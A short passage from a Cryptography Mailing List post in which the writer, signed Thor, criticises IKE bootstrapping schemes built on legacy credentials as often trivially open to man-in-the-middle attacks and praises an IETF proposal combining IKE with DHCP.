(of course, I also became very skeptical of many other folks'
"use legacy credentials to bootstrap IKE" techniques; there
are implementations out there in widespread use which default
to only authentication methods that are trivially MITMed, and
at least one I can think of that _can not be configured_ to
do standard IKE in a secure way.  Ouch! But the simultaneous
IKE and DHCP proposal I read a few years ago at the London
IETF seemed pretty sound.)

Thor

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]